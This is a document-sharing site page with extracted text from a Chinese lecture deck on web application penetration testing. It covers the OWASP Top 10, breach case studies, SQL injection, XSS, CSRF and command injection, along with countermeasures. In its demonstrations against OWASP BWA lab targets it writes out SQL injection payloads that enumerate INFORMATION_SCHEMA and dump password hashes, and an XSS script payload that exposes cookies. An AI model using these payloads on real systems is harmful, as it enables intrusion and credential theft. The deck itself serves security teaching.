Web应用渗透技术[PPT课件].pptx

  1. 1、本文档共50页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Web应用渗透技术[PPT课件]

Web应用渗透测试技术 主讲人:刘 璟;Outline;Web应用渗透技术基础;什么是渗透测试;什么是渗透测试;Web应用程序体系结构;Web应用渗透技术基础;OWASP Web漏洞TOP 10;OWASP Top Ten;OWASP Top Ten;补充知识:cookie;OWASP Top Ten;OWASP Top 10 2013;Web应用渗透技术基础;SONY黑客攻击案;SONY黑客攻击案;CSDN数据泄露门;Web应用渗透技术基础;Web渗透测试工具简介;Outline;Web应用漏洞扫描探测;Outline;Web应用程序渗透测试;SQL注入攻击;“SQL注入”攻击示例;SQL注入攻击演示;假设后台的查询语句是这样设置的: Select 列 from 表 where ID= ? 因此如果输入 ‘ or ’1=1 ,数据表的每一列都将显示出来。 查询INFORMATION_SCHEMA系统表: UNION SELECT 1, table_name from INFORMATION_SCHEMA.tables -- ,发现users表。 列出user表的内容: UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = users -- ,发现password列。 取得口令的MD5值: UNION SELECT NULL, password from users -- ;使用concat()函数将所有的信息都列出来: UNION SELECT password, concat(first_name, , last_name, ,user) from users -- ‘ 使用sqlmap获取口令明文。 MD5 Hash值也可以在线查询: 例如上面我们通过SQL注入攻击拿到了admin账户口令的MD5 Hash值为 “21232f297a57a5a743894a0e4a801fc3”, 我们通过上网查询,可以得到对应的口名明文。;防范对策;Web应用程序渗透测试;跨站脚本(XSS)攻击;常见的XSS恶意输入;XSS攻击分类;反射式XSS攻击;访问OWASP BWA靶机来演示;存储式XSS攻击;使用OWASP BWA的Multillidae应用程序演示 访问Mutillidae的Cross Site Scripting (XSS) 输入:SCRIPT/XSS SRC=/xss.js/SCRIPT xss.js的内容如下: document.write (This is remote text via xss.js located at + document.cookie); alert (This is remote text via xss.js located at + document.cookie);;防范对策;Web应用程序渗透测试;跨站点请求伪造;CSRF攻击示例;防范措施;Web应用程序渗透测试;命令注入实例分析;防范措施;Outline;总 结;推荐书籍

您可能关注的文档

文档评论(0)

2017meng + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档